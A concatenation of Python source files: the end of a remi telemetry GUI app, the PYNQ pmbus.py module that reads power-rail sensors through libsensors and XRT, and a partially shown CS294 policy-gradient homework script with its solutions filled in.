self.left4.set_text("\nThr: 32 %") self.t5.set_text("Batt: 23.2V") self.t6.set_text("5476 RPM") incrementa_number_for_testing += 1 time.sleep(0.18) def on_close(self): """ When app closes, the thread gets stopped """ self.thread_alive_flag = False super(MyApp, self).on_close() def onload(self, emitter): """ WebPage Event that occurs on webpage loaded """ self.execute_javascript("""if (screen.width == 427 && screen.height == 240) {document.body.style.zoom="68%";}""") if __name__ == "__main__": start(Application, address='0.0.0.0', port=8080, multiple_instance=False, start_browser=True, debug=False, 
update_interval=0.2)
pmbus.py
# Copyright (c) 2016, Xilinx, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
import cffi
import glob
import os
import threading
import time
import warnings

__author__ = "Peter Ogden"
__copyright__ = "Copyright 2018, Xilinx"
__email__ = "pynq_support@xilinx.com"


# Declarations for the subset of the libsensors (lm-sensors) C API used in
# this module, handed to cffi.cdef so the shared library can be called
# directly without a compiled extension module.
_c_header = R"""
extern const char *libsensors_version;

typedef struct sensors_bus_id {
    short type;
    short nr;
} sensors_bus_id;

typedef struct sensors_chip_name {
    char *prefix;
    sensors_bus_id bus;
    int addr;
    char *path;
} sensors_chip_name;

int sensors_init(FILE *input);
void sensors_cleanup(void);
int sensors_parse_chip_name(const char *orig_name, sensors_chip_name *res);
void sensors_free_chip_name(sensors_chip_name *chip);
int sensors_snprintf_chip_name(char *str, size_t size,
                               const sensors_chip_name *chip);
const char *sensors_get_adapter_name(const sensors_bus_id *bus);

typedef struct sensors_feature sensors_feature;

char *sensors_get_label(const sensors_chip_name *name,
                        const sensors_feature *feature);
int sensors_get_value(const sensors_chip_name *name, int subfeat_nr,
                      double *value);
int sensors_set_value(const sensors_chip_name *name, int subfeat_nr,
                      double value);
int sensors_do_chip_sets(const sensors_chip_name *name);
const sensors_chip_name *sensors_get_detected_chips(
    const sensors_chip_name *match, int *nr);

typedef enum sensors_feature_type {
    SENSORS_FEATURE_IN = 0x00,
    SENSORS_FEATURE_FAN = 0x01,
    SENSORS_FEATURE_TEMP = 0x02,
    SENSORS_FEATURE_POWER = 0x03,
    SENSORS_FEATURE_ENERGY = 0x04,
    SENSORS_FEATURE_CURR = 0x05,
    SENSORS_FEATURE_HUMIDITY = 0x06,
    SENSORS_FEATURE_MAX_MAIN,
    SENSORS_FEATURE_VID = 0x10,
    SENSORS_FEATURE_INTRUSION = 0x11,
    SENSORS_FEATURE_MAX_OTHER,
    SENSORS_FEATURE_BEEP_ENABLE = 0x18,
    SENSORS_FEATURE_MAX,
    SENSORS_FEATURE_UNKNOWN = 0x7fffffff,
} sensors_feature_type;

typedef enum sensors_subfeature_type {
    SENSORS_SUBFEATURE_IN_INPUT = 0,
    SENSORS_SUBFEATURE_IN_MIN,
    SENSORS_SUBFEATURE_IN_MAX,
    SENSORS_SUBFEATURE_IN_LCRIT,
    SENSORS_SUBFEATURE_IN_CRIT,
    SENSORS_SUBFEATURE_IN_AVERAGE,
    SENSORS_SUBFEATURE_IN_LOWEST,
    SENSORS_SUBFEATURE_IN_HIGHEST,
    SENSORS_SUBFEATURE_IN_ALARM = 0x80,
    SENSORS_SUBFEATURE_IN_MIN_ALARM,
    SENSORS_SUBFEATURE_IN_MAX_ALARM,
    SENSORS_SUBFEATURE_IN_BEEP,
    SENSORS_SUBFEATURE_IN_LCRIT_ALARM,
    SENSORS_SUBFEATURE_IN_CRIT_ALARM,

    SENSORS_SUBFEATURE_FAN_INPUT = 0x100,
    SENSORS_SUBFEATURE_FAN_MIN,
    SENSORS_SUBFEATURE_FAN_MAX,
    SENSORS_SUBFEATURE_FAN_ALARM = 0x180,
    SENSORS_SUBFEATURE_FAN_FAULT,
    SENSORS_SUBFEATURE_FAN_DIV,
    SENSORS_SUBFEATURE_FAN_BEEP,
    SENSORS_SUBFEATURE_FAN_PULSES,
    SENSORS_SUBFEATURE_FAN_MIN_ALARM,
    SENSORS_SUBFEATURE_FAN_MAX_ALARM,

    SENSORS_SUBFEATURE_TEMP_INPUT = 0x200,
    SENSORS_SUBFEATURE_TEMP_MAX,
    SENSORS_SUBFEATURE_TEMP_MAX_HYST,
    SENSORS_SUBFEATURE_TEMP_MIN,
    SENSORS_SUBFEATURE_TEMP_CRIT,
    SENSORS_SUBFEATURE_TEMP_CRIT_HYST,
    SENSORS_SUBFEATURE_TEMP_LCRIT,
    SENSORS_SUBFEATURE_TEMP_EMERGENCY,
    SENSORS_SUBFEATURE_TEMP_EMERGENCY_HYST,
    SENSORS_SUBFEATURE_TEMP_LOWEST,
    SENSORS_SUBFEATURE_TEMP_HIGHEST,
    SENSORS_SUBFEATURE_TEMP_MIN_HYST,
    SENSORS_SUBFEATURE_TEMP_LCRIT_HYST,
    SENSORS_SUBFEATURE_TEMP_ALARM = 0x280,
    SENSORS_SUBFEATURE_TEMP_MAX_ALARM,
    SENSORS_SUBFEATURE_TEMP_MIN_ALARM,
    SENSORS_SUBFEATURE_TEMP_CRIT_ALARM,
    SENSORS_SUBFEATURE_TEMP_FAULT,
    SENSORS_SUBFEATURE_TEMP_TYPE,
    SENSORS_SUBFEATURE_TEMP_OFFSET,
    SENSORS_SUBFEATURE_TEMP_BEEP,
    SENSORS_SUBFEATURE_TEMP_EMERGENCY_ALARM,
    SENSORS_SUBFEATURE_TEMP_LCRIT_ALARM,

    SENSORS_SUBFEATURE_POWER_AVERAGE = 0x300,
    SENSORS_SUBFEATURE_POWER_AVERAGE_HIGHEST,
    SENSORS_SUBFEATURE_POWER_AVERAGE_LOWEST,
    SENSORS_SUBFEATURE_POWER_INPUT,
    SENSORS_SUBFEATURE_POWER_INPUT_HIGHEST,
    SENSORS_SUBFEATURE_POWER_INPUT_LOWEST,
    SENSORS_SUBFEATURE_POWER_CAP,
    SENSORS_SUBFEATURE_POWER_CAP_HYST,
    SENSORS_SUBFEATURE_POWER_MAX,
    SENSORS_SUBFEATURE_POWER_CRIT,
    SENSORS_SUBFEATURE_POWER_AVERAGE_INTERVAL = 0x380,
    SENSORS_SUBFEATURE_POWER_ALARM,
    SENSORS_SUBFEATURE_POWER_CAP_ALARM,
    SENSORS_SUBFEATURE_POWER_MAX_ALARM,
    SENSORS_SUBFEATURE_POWER_CRIT_ALARM,

    SENSORS_SUBFEATURE_ENERGY_INPUT = 0x400,

    SENSORS_SUBFEATURE_CURR_INPUT = 0x500,
    SENSORS_SUBFEATURE_CURR_MIN,
    SENSORS_SUBFEATURE_CURR_MAX,
    SENSORS_SUBFEATURE_CURR_LCRIT,
    SENSORS_SUBFEATURE_CURR_CRIT,
    SENSORS_SUBFEATURE_CURR_AVERAGE,
    SENSORS_SUBFEATURE_CURR_LOWEST,
    SENSORS_SUBFEATURE_CURR_HIGHEST,
    SENSORS_SUBFEATURE_CURR_ALARM = 0x580,
    SENSORS_SUBFEATURE_CURR_MIN_ALARM,
    SENSORS_SUBFEATURE_CURR_MAX_ALARM,
    SENSORS_SUBFEATURE_CURR_BEEP,
    SENSORS_SUBFEATURE_CURR_LCRIT_ALARM,
    SENSORS_SUBFEATURE_CURR_CRIT_ALARM,

    SENSORS_SUBFEATURE_HUMIDITY_INPUT = 0x600,

    SENSORS_SUBFEATURE_VID = 0x1000,

    SENSORS_SUBFEATURE_INTRUSION_ALARM = 0x1100,
    SENSORS_SUBFEATURE_INTRUSION_BEEP,

    SENSORS_SUBFEATURE_BEEP_ENABLE = 0x1800,

    SENSORS_SUBFEATURE_UNKNOWN = 0x7fffffff,
} sensors_subfeature_type;

struct sensors_feature {
    char *name;
    int number;
    sensors_feature_type type;
    int first_subfeature;
    int padding1;
};

typedef struct sensors_subfeature {
    char *name;
    int number;
    sensors_subfeature_type type;
    int mapping;
    unsigned int flags;
} sensors_subfeature;

const sensors_feature *
sensors_get_features(const sensors_chip_name *name, int *nr);

const sensors_subfeature *
sensors_get_all_subfeatures(const sensors_chip_name *name,
                            const sensors_feature *feature, int *nr);

const sensors_subfeature *
sensors_get_subfeature(const sensors_chip_name *name,
                       const sensors_feature *feature,
                       sensors_subfeature_type type);
"""

_ffi = cffi.FFI()

try:
    _ffi.cdef(_c_header)
    _lib = _ffi.dlopen("libsensors.so.4")
except Exception as e:
    # libsensors is optional: when it cannot be loaded, _lib stays None and
    # Sensor.value reads 0 while _enumerate_sensors warns and returns {}.
    # NOTE(review): `e` is unused; a bare `except Exception:` would do.
    _lib = None


class SysFSSensor:
    """Sensor backed by a single sysfs attribute file.

    Each read opens the file at `path`, parses it as a float and applies
    `scale` (sysfs hwmon values are typically in milli-units).
    """

    def __init__(self, path, unit, name, scale):
        self._path = path
        self._unit = unit
        self.name = name
        self._scale = scale
        # No upstream sensors: this sensor is read directly from the file.
        self.parents = tuple()

    @property
    def value(self):
        # Re-read the file on every access so the value is always current.
        with open(self._path, "r") as f:
            raw_value = float(f.read())
        return raw_value * self._scale

    def get_value(self, parents=None):
        # `parents` is accepted for interface compatibility with derived
        # sensors (see MultiSensor) but is not needed here.
        return self.value

    def __repr__(self):
        return "Sensor {{name={}, value={}{}}}".format(
            self.name, self.value, self._unit)


class DerivedPowerSensor:
    """Virtual power sensor computed as voltage * current.

    Used when a rail exposes voltage and current sensors but no dedicated
    power sensor.
    """

    def __init__(self, name, voltage, current):
        # NOTE(review): this local `parents` is unused; the attribute below
        # is what MultiSensor actually consumes.
        parents = (voltage, current)
        self.voltage_sensor = voltage
        self.current_sensor = current
        self.name = name
        self.parents = (voltage, current)

    def get_value(self, parents=None):
        # When MultiSensor supplies already-read parent values, use them so
        # each underlying sensor is only sampled once per collection pass.
        if parents is None:
            return self.voltage_sensor.value * self.current_sensor.value
        else:
            return parents[0] * parents[1]

    @property
    def value(self):
        return self.get_value()

    def __repr__(self):
        return "Sensor {{name={}, value={}W}}".format(
            self.name, self.value)


class Sensor:
    """Interacts with a sensor exposed by libsensors

    The value of the sensor is determined by the unit of the
    underlying sensor API - that is generally Volts for potential
    difference, Amperes for current, Watts for power and degrees
    Centigrade for temperature

    Attributes
    ----------
    name : str
        The name of the sensor
    value : float
        The current value of the sensor

    """

    def __init__(self, chip, number, unit, name):
        """Create a new sensor object wrapping a libsensors chip and feature

        Parameters
        ----------
        chip : FFI sensors_chip_name*
            The chip the sensor is on
        number : int
            The number of sensor on the chip
        unit : str
            Unit to append to the value when creating a string
            representation
        name : str
            Name of the sensor

        """
        self._chip = chip
        self._number = number
        # Single-element double array reused as the out-parameter for
        # sensors_get_value.
        self._value = _ffi.new("double [1]")
        self._unit = unit
        self.name = name
        self.parents = tuple()

    @property
    def value(self):
        """Read the current value of the sensor

        """
        if _lib:
            # NOTE(review): the return code of sensors_get_value is ignored;
            # on failure the previous buffer contents are returned.
            _lib.sensors_get_value(self._chip, self._number, self._value)
            return self._value[0]
        else:
            # libsensors unavailable - report a harmless constant.
            return 0

    def get_value(self, parents=None):
        return self.value

    def __repr__(self):
        return "Sensor {{name={}, value={}{}}}".format(
            self.name, self.value, self._unit)


class Rail:
    """Bundles up to three sensors monitoring the same power rail

    Represents a power rail in the system monitored by up to three
    sensors for voltage, current and power.

    Attributes
    ----------
    name : str
        Name of the power rail
    voltage : Sensor or None
        Voltage sensor for the rail or None if not available
    current : Sensor or None
        Current sensor for the rail or None if not available
    power : Sensor or None
        Power sensor for the rail or None if not available

    """

    def __init__(self, name):
        """Create a new Rail with the specified rail

        """
        self.name = name
        self.voltage = None
        self.current = None
        self.power = None

    def __repr__(self):
        # Only include the sensors that actually exist on this rail.
        args = ["name=" + self.name]
        if self.voltage:
            args.append("voltage=" + repr(self.voltage))
        if self.current:
            args.append("current=" + repr(self.current))
        if self.power:
            args.append("power=" + repr(self.power))
        return "Rail {{{}}}".format(', '.join(args))


class XrtInfoDump:
    """Snapshot provider for XRT device telemetry.

    Acts as the shared parent of all XrtSensor objects for one device: a
    single call to get_value returns every reading as a flat dict keyed by
    "<rail>_v" / "<rail>_i", so one device query serves many sensors.
    """

    def __init__(self, device):
        self._device = device
        self.parents = tuple()

    def get_value(self, parents=None):
        info = self._device.device_info
        # Map the XRT device_info field names onto the rail naming scheme
        # used by get_xrt_sysfs_rails ("_v" = voltage, "_i" = current).
        return {
            "0v85_v": info.m0v85,
            "12v_aux_v": info.m12VAux,
            "12v_aux_i": info.mAuxCurr,
            "12v_pex_v": info.m12VPex,
            "12v_pex_i": info.mPexCurr,
            "12v_sw_v": info.m12vSW,
            "1v8_v": info.m1v8Top,
            "3v3_aux_v": info.m3v3Aux,
            "3v3_pex_v": info.m3v3Pex,
            "mgt0v9avcc_v": info.mMgt0v9,
            "mgtavtt_v": info.mMgtVtt,
            "sys_5v5_v": info.mSys5v5,
            "vccint_v": info.mVccIntVol,
            "vccint_i": info.mCurrent
        }


class XrtSensor:
    """Single reading extracted from an XrtInfoDump snapshot.

    Looks up `field` in the parent's dict and applies `scale` (0.001 in
    get_xrt_sysfs_rails - presumably the raw values are milli-units;
    TODO confirm against the XRT documentation).
    """

    def __init__(self, unit, name, scale, parent, field):
        # Exactly one parent: the XrtInfoDump whose snapshot we index into.
        self.parents = (parent,)
        self._unit = unit
        self.name = name
        self._scale = scale
        self._field = field

    def get_value(self, parents=None):
        if parents is None:
            # Standalone read: trigger a fresh snapshot from the parent.
            parents = (self.parents[0].get_value(),)
        return parents[0][self._field] * self._scale

    @property
    def value(self):
        return self.get_value()

    def __repr__(self):
        return "Sensor {{name={}, value={}{}}}".format(
            self.name, self.value, self._unit)


class XrtRail:
    """Rail-like bundle of XRT sensors for one named power rail.

    Mirrors the Rail interface: voltage/current attributes are populated
    from the snapshot keys "<name>_v" / "<name>_i" when present, and a
    DerivedPowerSensor is synthesized when both exist.
    """

    def __init__(self, name, sample_dict, parent):
        self.name = name
        if name + "_v" in sample_dict:
            self.voltage = XrtSensor("V", name + "_vol", 0.001, parent,
                                     name + "_v")
        else:
            self.voltage = None
        if name + "_i" in sample_dict:
            self.current = XrtSensor("A", name + "_curr", 0.001, parent,
                                     name + "_i")
        else:
            self.current = None
        if self.voltage and self.current:
            # No native power reading - derive it from V * I.
            self.power = DerivedPowerSensor(name + "_power",
                                            self.voltage, self.current)
        else:
            self.power = None

    def __repr__(self):
        args = ["name=" + self.name]
        if self.voltage:
            args.append("voltage=" + repr(self.voltage))
        if self.current:
            args.append("current=" + repr(self.current))
        if self.power:
            args.append("power=" + repr(self.power))
        return "XrtRail {{{}}}".format(', '.join(args))


def get_xrt_sysfs_rails(device=None):
    """Return a dict of XrtRail objects for the given XRT device.

    When `device` is None the active PYNQ device is used. All rails share
    one XrtInfoDump parent so a MultiSensor pass queries the device once.
    """
    if device is None:
        # Imported lazily so this module can load without pynq installed.
        from pynq.pl_server import Device
        device = Device.active_device

    rail_names = ["0v85", "12v_aux", "12v_pex", "12v_sw", "1v8",
                  "3v3_aux", "3v3_pex", "mgt0v9avcc", "mgtavtt",
                  "sys_5v5", "vccint"
                  ]

    infodump = XrtInfoDump(device)
    sample_dict = infodump.get_value()
    rails = {}
    for n in rail_names:
        rails[n] = XrtRail(n, sample_dict, infodump)
    return rails


def _enumerate_sensors(config_file=None):
    # Walk every chip and feature libsensors detects and build Rail objects
    # keyed by the feature label; voltage/current/power features sharing a
    # label are merged into the same Rail.
    if _lib is None:
        warnings.warn("Could not initialise libsensors library")
        return {}
    if config_file:
        # NOTE(review): sensors_init expects a C FILE*; passing a Python
        # file object through cffi here looks suspect - confirm this path
        # is exercised/works.
        with open(config_file, 'r') as handle:
            _lib.sensors_init(handle);
    else:
        _lib.sensors_init(_ffi.NULL)

    # int out-parameters used as iteration cursors by the libsensors
    # get_detected_chips / get_features enumeration API.
    chip_nr = _ffi.new("int [1]")
    feature_nr = _ffi.new("int [1]")

    rails = {}

    chip_nr[0] = 0
    cn = _lib.sensors_get_detected_chips(_ffi.NULL, chip_nr)
    while cn:
        feature_nr[0] = 0
        feature = _lib.sensors_get_features(cn, feature_nr)
        while feature:
            name = _ffi.string(_lib.sensors_get_label(cn, feature)).decode()
            subfeature = None
            # Only the instantaneous "input" subfeature of each supported
            # feature type is exposed.
            if feature.type == _lib.SENSORS_FEATURE_POWER:
                subfeature = _lib.sensors_get_subfeature(
                    cn, feature, _lib.SENSORS_SUBFEATURE_POWER_INPUT)
                feature_type = "power"
                unit = "W"
            elif feature.type == _lib.SENSORS_FEATURE_IN:
                subfeature = _lib.sensors_get_subfeature(
                    cn, feature, _lib.SENSORS_SUBFEATURE_IN_INPUT)
                feature_type = "voltage"
                unit = "V"
            elif feature.type == _lib.SENSORS_FEATURE_CURR:
                subfeature = _lib.sensors_get_subfeature(
                    cn, feature, _lib.SENSORS_SUBFEATURE_CURR_INPUT)
                feature_type = "current"
                unit = "A"
            if subfeature:
                if name not in rails:
                    rails[name] = Rail(name)
                setattr(rails[name], feature_type,
                        Sensor(cn, subfeature.number, unit,
                               "{}_{}".format(
                                   name, feature_type)))
            feature = _lib.sensors_get_features(cn, feature_nr)
        cn = _lib.sensors_get_detected_chips(_ffi.NULL, chip_nr)
    return rails


def get_rails(config_file=None):
    """Returns a dictionary of power rails

    Parameters
    ----------
    config_file : str
        Path to a configuration file for libsensors to use
        in place of the the system-wide default

    Returns
    -------
    dict {str : Rail}
        Dictionary of power rails with the name of the rail as
        the key and a Rail object as the value

    """
    return _enumerate_sensors(config_file)


class MultiSensor:
    """Class for efficiently collecting the readings from multiple sensors

    """

    def __init__(self, sensors):
        self._sensors = sensors

    def get_values(self):
        # `stored` memoizes each sensor's reading for this pass so shared
        # parents (e.g. one XrtInfoDump feeding many XrtSensors) are only
        # sampled once.
        stored = {}
        return tuple((self._get_value(s, stored) for s in self._sensors))

    def _get_value(self, sensor, stored):
        # Depth-first evaluation: resolve parents first and hand their
        # cached values to the sensor's get_value.
        if sensor in stored:
            return stored[sensor]
        value = sensor.get_value(
            [self._get_value(p, stored) for p in sensor.parents])
        stored[sensor] = value
        return value


class DataRecorder:
    """Class to record sensors during an execution

    The DataRecorder provides a way of recording sensor data using a
    `with` block.

    """

    def __init__(self, *sensors):
        """Create a new DataRecorder attached to the specified sensors

        """
        # pandas is imported lazily to keep module import cheap when the
        # recorder is unused.
        import pandas as pd
        # -1 so the first record()/mark() call yields index 0.
        self._record_index = -1
        self._sensors = sensors
        self._getter = MultiSensor(sensors)
        self._columns = ['Mark']
        self._times = []
        self._columns.extend([s.name for s in sensors])
        self._frame = pd.DataFrame(columns=self._columns,
                                   index=pd.DatetimeIndex([]), dtype='f4')
        self._callbacks = []
        self._data = []
        self._thread = None

    def __del__(self):
        # Stop the sampling thread if the recorder is collected while
        # still recording.
        if self._thread:
            self.stop()

    def reset(self):
        """Clear the internal state of the data recorder without forgetting
        which sensors to record

        """
        self._frame.drop(self._frame.index, inplace=True)
        self._record_index = -1

    def record(self, interval):
        """Start recording

        """
        if self._thread:
            raise RuntimeError("DataRecorder is already recording")
        self._thread = threading.Thread(
            target=DataRecorder._thread_func, args=[self])
        self._interval = interval
        self._done = False
        self._record_index += 1
        self._thread.start()
        # Returning self enables `with recorder.record(0.1):` usage.
        return self

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        self.stop()
        return

    def stop(self):
        """Stops recording

        """
        self._done = True
        self._thread.join()
        self._thread = None

    def mark(self):
        """Increment the Invocation count

        """
        self._record_index += 1
        return self._record_index

    def _thread_func(self):
        # Background sampling loop: one DataFrame row per interval,
        # timestamped with the wall-clock time of the sample.
        import pandas as pd
        while not self._done:
            row = [self._record_index]
            row.extend(self._getter.get_values())
            self._frame.loc[pd.Timestamp.now()] = row
            time.sleep(self._interval)

    @property
    def frame(self):
        """Return a pandas DataFrame of the recorded data

        The frame consists of the following fields
        Index : The timestamp of the measurement
        Mark : counts the number of times that record or mark was called
        Sensors* : one column per sensor

        """
        return self._frame
# ===== file: train_pg_f18.py =====
""" Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017 Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany """ import numpy as np import tensorflow as tf import gym import logz import os import time import inspect from multiprocessing import Process tf.logging.set_verbosity(tf.logging.ERROR) os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' #============================================================================================# # Utilities #============================================================================================# def normalize(values, mean=0., std=1.): values = (values - values.mean()) / (values.std() + 1e-8) return mean + (std + 1e-8) * values #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None): """ Builds a feedforward neural network arguments: input_placeholder: placeholder variable for the state (batch_size, input_size) output_size: size of the output layer scope: variable scope of the network n_layers: number of hidden layers size: dimension of the hidden layer activation: activation of the hidden layers output_activation: activation of the ouput layers returns: output placeholder of the network (the result of a forward pass) Hint: use tf.layers.dense """ # YOUR CODE HERE with tf.variable_scope(scope): h = input_placeholder for i in range(n_layers): h = tf.layers.dense(h, size, activation=activation, name='h{}'.format(i + 1)) output_placeholder = tf.layers.dense(h, output_size, activation=output_activation, name='output') return output_placeholder def pathlength(path): return len(path["reward"]) def setup_logger(logdir, locals_): # Configure output 
directory for logging logz.configure_output_dir(logdir) # Log experimental parameters args = inspect.getargspec(train_PG)[0] params = {k: locals_[k] if k in locals_ else None for k in args} logz.save_params(params) #============================================================================================# # Policy Gradient #============================================================================================# class Agent(object): def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args): super(Agent, self).__init__() self.ob_dim = computation_graph_args['ob_dim'] self.ac_dim = computation_graph_args['ac_dim'] self.discrete = computation_graph_args['discrete'] self.size = computation_graph_args['size'] self.n_layers = computation_graph_args['n_layers'] self.learning_rate = computation_graph_args['learning_rate'] self.pg_step = computation_graph_args['pg_step'] self.animate = sample_trajectory_args['animate'] self.max_path_length = sample_trajectory_args['max_path_length'] self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch'] self.gamma = estimate_return_args['gamma'] self.reward_to_go = estimate_return_args['reward_to_go'] self.nn_baseline = estimate_return_args['nn_baseline'] self.normalize_advantages = estimate_return_args['normalize_advantages'] def init_tf_sess(self): tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1) #tf_config = tf.ConfigProto() tf_config.gpu_options.allow_growth = True self.sess = tf.Session(config=tf_config) self.sess.__enter__() # equivalent to `with self.sess:` tf.global_variables_initializer().run() #pylint: disable=E1101 #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def define_placeholders(self): """ Placeholders for batch batch observations / actions / advantages in 
policy gradient loss function. See Agent.build_computation_graph for notation returns: sy_ob_no: placeholder for observations sy_ac_na: placeholder for actions sy_adv_n: placeholder for advantages """ sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32) if self.discrete: sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32) else: sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32) # YOUR CODE HERE sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32) return sy_ob_no, sy_ac_na, sy_adv_n #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def policy_forward_pass(self, sy_ob_no): """ Constructs the symbolic operation for the policy network outputs, which are the parameters of the policy distribution p(a|s) arguments: sy_ob_no: (batch_size, self.ob_dim) returns: the parameters of the policy. if discrete, the parameters are the logits of a categorical distribution over the actions sy_logits_na: (batch_size, self.ac_dim) if continuous, the parameters are a tuple (mean, log_std) of a Gaussian distribution over actions. log_std should just be a trainable variable, not a network output. sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) Hint: use the 'build_mlp' function to output the logits (in the discrete case) and the mean (in the continuous case). Pass in self.n_layers for the 'n_layers' argument, and pass in self.size for the 'size' argument. 
""" if self.discrete: # YOUR_CODE_HERE sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'policy_mlp', self.n_layers, self.size) return sy_logits_na else: # YOUR_CODE_HERE sy_mean = build_mlp(sy_ob_no, self.ac_dim, 'policy_mlp', self.n_layers, self.size) sy_logstd = tf.get_variable('sy_logstd', [self.ac_dim]) #sy_logstd = tf.get_variable('sy_logstd', [self.ac_dim], dtype=tf.float32, trainable=True) return (sy_mean, sy_logstd) #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def sample_action(self, policy_parameters): """ Constructs a symbolic operation for stochastically sampling from the policy distribution arguments: policy_parameters if discrete: logits of a categorical distribution over actions sy_logits_na: (batch_size, self.ac_dim) if continuous: (mean, log_std) of a Gaussian distribution over actions sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) returns: sy_sampled_ac: if discrete: (batch_size,) if continuous: (batch_size, self.ac_dim) Hint: for the continuous case, use the reparameterization trick: The output from a Gaussian distribution with mean 'mu' and std 'sigma' is mu + sigma * z, z ~ N(0, I) This reduces the problem to just sampling z. (Hint: use tf.random_normal!) 
""" if self.discrete: sy_logits_na = policy_parameters # YOUR_CODE_HERE sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=1) else: sy_mean, sy_logstd = policy_parameters # YOUR_CODE_HERE sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean)) return sy_sampled_ac #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def get_neg_log_prob(self, policy_parameters, sy_ac_na): """ Constructs a symbolic operation for computing the negative log probability of a set of actions that were actually taken according to the policy arguments: policy_parameters if discrete: logits of a categorical distribution over actions sy_logits_na: (batch_size, self.ac_dim) if continuous: (mean, log_std) of a Gaussian distribution over actions sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) sy_ac_na: if discrete: (batch_size,) if continuous: (batch_size, self.ac_dim) returns: sy_neg_logprob_n: (batch_size) Hint: For the discrete case, use the log probability under a categorical distribution. For the continuous case, use the log probability under a multivariate gaussian. 
""" if self.discrete: sy_logits_na = policy_parameters # YOUR_CODE_HERE sy_neg_logprob_n = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=sy_ac_na, logits=sy_logits_na ) else: sy_mean, sy_logstd = policy_parameters # YOUR_CODE_HERE sy = (sy_ac_na - sy_mean) / tf.exp(sy_logstd) sy_neg_logprob_n = 0.5 * tf.reduce_sum(sy * sy, axis=1) return sy_neg_logprob_n def build_computation_graph(self): """ Notes on notation: Symbolic variables have the prefix sy_, to distinguish them from the numerical values that are computed later in the function Prefixes and suffixes: ob - observation ac - action _no - this tensor should have shape (batch self.size /n/, observation dim) _na - this tensor should have shape (batch self.size /n/, action dim) _n - this tensor should have shape (batch self.size /n/) Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis is None ---------------------------------------------------------------------------------- loss: a function of self.sy_neg_logprob_n and self.sy_adv_n that we will differentiate to get the policy gradient. """ self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders() # The policy takes in an observation and produces a distribution over the action space self.policy_parameters = self.policy_forward_pass(self.sy_ob_no) # We can sample actions from this action distribution. # This will be called in Agent.sample_trajectory() where we generate a rollout. self.sy_sampled_ac = self.sample_action(self.policy_parameters) # We can also compute the logprob of the actions that were actually taken by the policy # This is used in the loss function. 
self.sy_neg_logprob_n = self.get_neg_log_prob(self.policy_parameters, self.sy_ac_na) #========================================================================================# # ----------PROBLEM 2---------- # Loss Function and Training Operation #========================================================================================# loss = tf.reduce_mean(self.sy_neg_logprob_n * self.sy_adv_n) # YOUR CODE HERE self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss) #========================================================================================# # ----------PROBLEM 6---------- # Optional Baseline # # Define placeholders for targets, a loss function and an update op for fitting a # neural network baseline. These will be used to fit the neural network baseline. #========================================================================================# if self.nn_baseline: self.baseline_prediction = tf.squeeze(build_mlp( self.sy_ob_no, 1, "nn_baseline", n_layers=self.n_layers, size=self.size)) # YOUR_CODE_HERE self.sy_target_n = tf.placeholder(shape=[None], name='target', dtype=tf.float32) # baseline_loss = tf.losses.mean_squared_error(self.sy_target_n, self.baseline_prediction) baseline_loss = tf.nn.l2_loss(self.baseline_prediction - self.sy_target_n) self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss) def sample_trajectories(self, itr, env): # Collect paths until we have enough timesteps timesteps_this_batch = 0 paths = [] while True: animate_this_episode = (len(paths)==0 and (itr % 10 == 0) and self.animate) path = self.sample_trajectory(env, animate_this_episode) paths.append(path) timesteps_this_batch += 